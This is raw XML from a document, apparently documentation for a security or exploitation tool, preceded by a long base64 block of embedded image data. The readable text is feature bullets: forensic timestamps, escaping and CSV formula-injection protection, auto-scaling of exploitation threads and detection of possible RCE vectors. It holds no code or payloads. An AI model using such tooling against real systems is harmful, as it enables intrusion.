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Advantages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Cross-Format Consistency</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: Same data model works for all outputs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Forensic Readiness</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: ISO 8601 timestamps aid incident investigation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Safe Content Handling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Truncates large responses (500+ chars)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Escapes XML control characters</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1013"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Prevents CSV formula injection</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Key Advantages</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1014"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Auto-scales exploitation threads</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1014"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Preserves original encoding layers</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1014"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Detects potential RCE vectors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4.1.3.2 Workflow Phases</dc:title>
  <dc:creator/>
  <cp:keywords/>
  <dcterms:created xsi:type="dcterms:W3CDTF">2025-05-02T21:57:41Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-05-02T21:57:41Z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